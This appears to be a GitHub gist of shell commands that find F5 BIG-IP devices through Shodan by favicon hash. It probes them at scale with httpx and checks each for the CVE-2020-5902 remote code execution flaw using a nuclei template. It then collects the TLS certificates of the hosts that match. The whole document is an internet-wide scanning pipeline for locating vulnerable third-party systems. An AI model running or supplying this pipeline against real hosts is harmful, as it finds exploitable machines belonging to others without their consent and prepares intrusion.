Skip to content

Instantly share code, notes, and snippets.

@LuD1161
Last active March 8, 2022 02:52
Show Gist options
  • Star 8 You must be signed in to star a gist
  • Fork 7 You must be signed in to fork a gist
  • Save LuD1161/dd6ee3fe9feca039fcda8ee4885a0427 to your computer and use it in GitHub Desktop.
Save LuD1161/dd6ee3fe9feca039fcda8ee4885a0427 to your computer and use it in GitHub Desktop.
F5 Slapdash attempt
# Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570
python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt
cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt
cut -d" " -f3 results.txt > targets.txt
sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace
interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt
grep 'issuer: ' all_certs.txt | grep -v 'root@localhost.localdomain'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment